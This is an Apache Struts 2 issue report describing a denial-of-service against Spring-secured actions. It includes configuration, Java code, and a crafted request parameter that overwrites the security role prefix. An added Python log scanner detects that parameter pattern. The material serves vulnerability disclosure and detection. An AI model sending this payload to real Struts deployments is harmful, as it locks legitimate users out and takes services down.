Struts 2 / WW-4805

At least a DoS attack is available for Spring secured actions

    Flags: Patch, Important

      Description

      This is an example of a DoS attack that is possible when a Struts 2 user uses Spring to secure their actions, as described in the section `Initializing Actions from Spring` of the spring-plugin documentation.

      Attack Steps:

      1. An anonymous user logs in as an authenticated user.
      2. Then tries
         http://{ip}:{port}/{action0-actionN}?advisors[{0-n}].advice.accessDecisionManager.decisionVoters[{0-n}].rolePrefix=breakit
         where {action0-actionN} are actions available to users.

      Attack Impacts:
      By replacing `rolePrefix`, the attacker blocks access to the secured actions for all defined roles, even for users who authenticate via login, so the services are down and a webapp restart is required to get back to normal!

      Configuration Example:

      1. spring-security.xml

            <global-method-security secured-annotations="enabled" proxy-target-class="true" />
            <http auto-config="true" use-expressions="false">
                <intercept-url pattern="/**" access="IS_AUTHENTICATED_ANONYMOUSLY" />
            </http>
            <authentication-manager erase-credentials="false">
                <authentication-provider>
                    <user-service>
                        <user name="admin" password="admin" authorities="ROLE_ADMIN" />
                        <user name="user" password="user" authorities="ROLE_USER" />
                    </user-service>
                </authentication-provider>
            </authentication-manager>

      2. applicationContext.xml

            <bean id="secureAction" class="me.zamani.yasser.ww_convention.actions.SecureAction"/>

      3. struts.xml

            <action name="admin" class="secureAction" method="admin">
                <result name="success" type="json" />
            </action>
            <action name="user" class="secureAction" method="user">
                <result name="success" type="json" />
            </action>

      4. SecureAction.java

            package me.zamani.yasser.ww_convention.actions;

            import org.springframework.security.access.annotation.Secured;

            // Spring-managed action bean; the Spring proxy created for it carries the
            // security advisors that the attack parameter names reach into.
            public class SecureAction {

                @Secured({"ROLE_ADMIN"})
                public String admin() {
                    return "success";
                }

                @Secured({"ROLE_USER"})
                public String user() {
                    return "success";
                }
            }

      5. Log in via http://{ip}:{port}/login as user.
      6. Open http://{ip}:{port}/user?advisors[0].advice.accessDecisionManager.decisionVoters[0].rolePrefix=breakit
      7. In another browser, log in via http://{ip}:{port}/login as admin.
      8. Try to access http://{ip}:{port}/admin, which fails!
      9. Also repeat step 5 and try to open http://{ip}:{port}/user, which also fails!
      10. Services are down and a webapp restart is required to get back to normal.
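      Added example (not from this report or the Struts project): a small Python check that flags request parameter names walking from a Struts action into the Spring AOP proxy and its security advice chain, the pattern this report describes, run over constructed access-log lines. The log format, the sample lines and the list of proxy-internal names are assumptions taken from the report above.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Property names that lead out of the action and into the Spring proxy's
# security advice chain (taken from the parameter name in the report).
PROXY_INTERNALS = {"advisors", "advice", "accessDecisionManager",
                   "decisionVoters", "rolePrefix"}

# Constructed Tomcat-style access log lines; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - user [12/Sep/2017:10:01:02 +0000] "GET /user HTTP/1.1" 200 17
10.0.0.5 - user [12/Sep/2017:10:01:09 +0000] "GET /user?advisors[0].advice.accessDecisionManager.decisionVoters[0].rolePrefix=breakit HTTP/1.1" 200 17
10.0.0.9 - admin [12/Sep/2017:10:02:00 +0000] "GET /admin?page=2&sort=name HTTP/1.1" 200 40
10.0.0.9 - admin [12/Sep/2017:10:02:30 +0000] "GET /admin?items[3].name=x HTTP/1.1" 200 40
"""

# client, ident, user, timestamp, method, request target, status
REQUEST_RE = re.compile(
    r'^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def suspicious_params(request_target):
    """Return parameter names whose navigation path touches proxy internals.

    Each name is split into identifier tokens so that 'advisors[0].advice'
    yields 'advisors', 'advice'; a plain 'items[3].name' is left alone."""
    query = urlsplit(request_target).query
    hits = []
    for name, _value in parse_qsl(query, keep_blank_values=True):
        tokens = re.findall(r"[A-Za-z_]\w*", name)
        if PROXY_INTERNALS.intersection(tokens):
            hits.append(name)
    return hits

def scan_log(text):
    """Return (client, user, path, flagged names) for each suspicious request."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # skip lines that are not request records
        client, user, _ts, _method, target, _status = match.groups()
        hits = suspicious_params(target)
        if hits:
            findings.append((client, user, urlsplit(target).path, hits))
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```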

      Reporter: Yasser Zamani